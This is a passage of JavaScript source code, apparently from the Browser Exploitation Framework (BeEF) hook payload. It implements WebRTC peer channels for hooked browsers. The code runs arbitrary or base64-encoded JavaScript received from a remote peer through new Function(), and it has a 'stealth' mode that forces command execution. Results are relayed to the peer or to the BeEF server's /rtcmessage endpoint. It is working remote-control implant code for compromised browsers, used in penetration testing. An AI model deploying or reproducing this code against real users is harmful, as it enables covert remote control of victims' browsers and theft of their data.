9213 } else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
9214 beef.debug('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');
9215 beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
9216
9217 // Command to perform arbitrary JS (while NOT stealthed)
9218 } else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
9219 beef.debug('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));
9220 beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
9221
9222 // B64d command from the /cmdexec API
9223 } else if (ev2.data.charAt(0) == "@") {
9224 beef.debug('message was a b64d command');
9225
9226 var fn = new Function(atob(ev2.data.substring(1)));
9227 fn();
9228 if (rtcstealth != false) { // force stealth back on ?
9229 beef.updater.execute_commands(); // FORCE execution while stealthed
9230 beef.updater.lock = true;
9231 }
9232
9233
9234 // Just a plain text message .. (while stealthed)
9235 } else if (rtcstealth != false) {
9236 beef.debug('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');
9237 beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
9238
9239 // Just a plan text message (while NOT stealthed)
9240 } else {
9241 beef.debug('received a message from peer['+peerid+'] - sending it back to beef');
9242 beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
9243 }
9244 }
9245}
9246
9247// How the browser executes received JS (this is pretty hacky)
9248Beefwebrtc.prototype.execCmd = function(input) {
9249 var fn = new Function(input);
9250 var res = fn();
9251 return res.toString();
9252}
9253
9254// Shortcut function to SEND a data messsage
9255Beefwebrtc.prototype.sendPeerMsg = function(msg) {
9256 beef.debug('sendPeerMsg to ' + this.peerid);
9257 this.dataChannel.send(msg);
9258}
9259
9260// Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
9261Beefwebrtc.prototype.maybeStart = function() {
9262 beef.debug("maybe starting ... ");
9263
9264 if (!this.started && this.signalingReady && this.turnDone) {
9265 beef.debug('Creating PeerConnection.');
9266 this.createPeerConnection();
9267
9268 this.started = true;
9269
9270 if (this.initiator) {
9271 beef.debug("Making the call now .. bzz bzz");
9272 this.doCall();
9273 } else {
9274 beef.debug("Receiving a call now .. somebuddy answer da fone?");
9275 this.calleeStart();
9276 }
9277
9278 } else {
9279 beef.debug("Not ready to start just yet..");
9280 }
9281}
9282
9283// RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
9284Beefwebrtc.prototype.doCall = function() {
9285 var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
9286 var self = this;
9287 globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
9288 beef.debug('Sending offer to peer, with constraints: \n' +
9289 ' \'' + JSON.stringify(constraints) + '\'.');
9290}
9291
9292// Helper method to merge SDP constraints
9293Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
9294 var merged = cons1;
9295 for (var name in cons2.mandatory) {
9296 merged.mandatory[name] = cons2.mandatory[name];
9297 }
9298 merged.optional.concat(cons2.optional);
9299 return merged;
9300}
9301
9302// Sets the local RTC session description, sends this information back (via signalling)
9303// The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
9304// The receiver uses this information too - and vice-versa - hence the signaling
9305Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
9306 // This fucking function does NOT receive a 'this' state, and you can't pass additional parameters
9307 // Stupid .. javascript :(
9308 // So I'm hacking it to find the peerid gah - I believe *this* is what means you can't establish peers concurrently
9309 // i.e. this browser will have to wait for this peerconnection to establish before attempting to connect to the next one..
9310 var peerid = null;
9311
9312 for (var k in beefrtcs) {
9313 if (beefrtcs[k].allgood === false) {
9314 peerid = beefrtcs[k].peerid;
9315 }
9316 }
9317 beef.debug("For peer: " + peerid + " Running setLocalAndSendMessage...");
9318
9319 globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
9320 beefrtcs[peerid].sendSignalMsg(sessionDescription);
9321
9322 function onSetSessionDescriptionSuccess() {
9323 beef.debug('Set session description success.');
9324 }
9325
9326 function onSetSessionDescriptionError() {
9327 beef.debug('Failed to set session description');
9328 }
9329}
9330
9331// If the browser can't build an SDP
9332Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
9333 beef.debug('Failed to create session description: ' + error.toString());
9334}
9335
9336// If the browser successfully sets a remote description
9337Beefwebrtc.prototype.onSetRemoteDescriptionSuccess = function() {
9338 beef.debug('Set remote session description successfully');
9339}
9340
9341// Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
9342Beefwebrtc.prototype.calleeStart = function() {
9343 // Callee starts to process cached offer and other messages.
9344 while (this.msgQueue.length > 0) {
9345 this.processSignalingMessage(this.msgQueue.shift());
9346 }
9347}
9348
9349// Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
9350Beefwebrtc.prototype.processSignalingMessage = function(message) {
9351 if (!this.started) {
9352 beef.debug('peerConnection has not been created yet!');
9353 return;
9354 }
9355
9356 if (message.type === 'offer') {
9357 beef.debug("Processing signalling message: OFFER");
9358 if (navigator.mozGetUserMedia) { // Mozilla shim fuckn shit - since the new
9359 // version of FF - which no longer works
9360 beef.debug("Moz shim here");
9361 globalrtc[this.peerid].setRemoteDescription(
9362 new RTCSessionDescription(message),
9363 function() {
9364 // globalrtc[this.peerid].createAnswer(function(answer) {
9365 // globalrtc[this.peerid].setLocalDescription(
9366
9367 var peerid = null;
9368
9369 for (var k in beefrtcs) {
9370 if (beefrtcs[k].allgood === false) {
9371 peerid = beefrtcs[k].peerid;
9372 }
9373 }
9374
9375 globalrtc[peerid].createAnswer(function(answer) {
9376 globalrtc[peerid].setLocalDescription(
9377 new RTCSessionDescription(answer),
9378 function() {
9379 beefrtcs[peerid].sendSignalMsg(answer);
9380 },function(error) {
9381 beef.debug("setLocalDescription error: " + error);
9382 });
9383 },function(error) {
9384 beef.debug("createAnswer error: " +error);
9385 });
9386 },function(error) {
9387 beef.debug("setRemoteDescription error: " + error);
9388 });
9389
9390 } else {
9391 this.setRemote(message);
9392 this.doAnswer();
9393 }
9394 } else if (message.type === 'answer') {
9395 beef.debug("Processing signalling message: ANSWER");
9396 if (navigator.mozGetUserMedia) { // terrible moz shim - as for the offer
9397 beef.debug("Moz shim here");
9398 globalrtc[this.peerid].setRemoteDescription(
9399 new RTCSessionDescription(message),
9400 function() {},
9401 function(error) {
9402 beef.debug("setRemoteDescription error: " + error);
9403 });
9404 } else {
9405 this.setRemote(message);
9406 }
9407 } else if (message.type === 'candidate') {
9408 beef.debug("Processing signalling message: CANDIDATE");
9409 var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
9410 candidate: message.candidate});
9411 this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
9412 globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
9413 } else if (message.type === 'bye') {
9414 this.onRemoteHangup();
9415 }
9416}
9417
9418// Used to set the RTC remote session
9419Beefwebrtc.prototype.setRemote = function(message) {
9420 globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
9421 this.onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
9422}
9423
9424// As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
9425Beefwebrtc.prototype.doAnswer = function() {
9426 beef.debug('Sending answer to peer.');
9427 globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
9428}
9429
9430// Helper method to determine what kind of ICE Candidate we've received
9431Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
9432 if (candidateSDP.indexOf("typ relay ") >= 0)
9433 return "TURN";
9434 if (candidateSDP.indexOf("typ srflx ") >= 0)
9435 return "STUN";
9436 if (candidateSDP.indexOf("typ host ") >= 0)
9437 return "HOST";
9438 return "UNKNOWN";
9439}
9440
9441// Event handler for successful addition of ICE Candidates
9442Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
9443 beef.debug('AddIceCandidate success.');
9444}
9445
9446// Event handler for unsuccessful addition of ICE Candidates
9447Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
9448 beef.debug('Failed to add Ice Candidate: ' + error.toString());
9449}
9450
9451// If a peer hangs up (we bring down the peerconncetion via the stop() method)
9452Beefwebrtc.prototype.onRemoteHangup = function() {
9453 beef.debug('Session terminated.');
9454 this.initiator = 0;
9455 // transitionToWaiting();
9456 this.stop();
9457}
9458
9459// Bring down the peer connection
9460Beefwebrtc.prototype.stop = function() {
9461 this.started = false; // we're no longer started
9462 this.signalingReady = false; // signalling isn't ready
9463 globalrtc[this.peerid].close(); // close the RTCPeerConnection option
9464 globalrtc[this.peerid] = null; // Remove it
9465 this.msgQueue.length = 0; // clear the msgqueue
9466 rtcstealth = false; // no longer stealth
9467 this.allgood = false; // allgood .. NAH UH
9468}
9469
9470// The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
9471// These are the methods which are executed via the custom extension of the hook.js
9472beef.webrtc = {
9473 // Start the RTCPeerConnection process
9474 start: function(initiator,peer,turnjson,stunservers,verbose) {
9475 if (peer in beefrtcs) {
9476 // If the RTC peer is not in a good state, try kickng it off again
9477 // This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
9478 if (beefrtcs[peer].allgood == false) {
9479 beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
9480 beefrtcs[peer].initialize();
9481 }
9482 } else {
9483 // Standard behaviour for new peer connections
9484 beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
9485 beefrtcs[peer].initialize();
9486 }
9487 },
9488
9489 // Check the status of all my peers ..
9490 status: function(me) {
9491 if (Object.keys(beefrtcs).length > 0) {
9492 for (var k in beefrtcs) {
9493 if (beefrtcs.hasOwnProperty(k)) {
9494 beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
9495 }
9496 }
9497 } else {
9498 beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
9499 }
9500 }
9501}
9502beef.regCmp('beef.webrtc');
9503
9504
9505//
9506// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
9507// Browser Exploitation Framework (BeEF) - http://beefproject.com
9508// See the file 'doc/COPYING' for copying permission
9509//
9510
9511/*
9512 Sometimes there are timing issues and looks like beef_init
9513 is not called at all (always in cross-origin situations,
9514 for example calling the hook with jquery getScript,
9515 or sometimes with event handler injections).
9516
9517 To fix this, we call again beef_init after 1 second.
9518 Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
9519 antisnatchor
9520 */
9521//setTimeout(beef_init, 1000);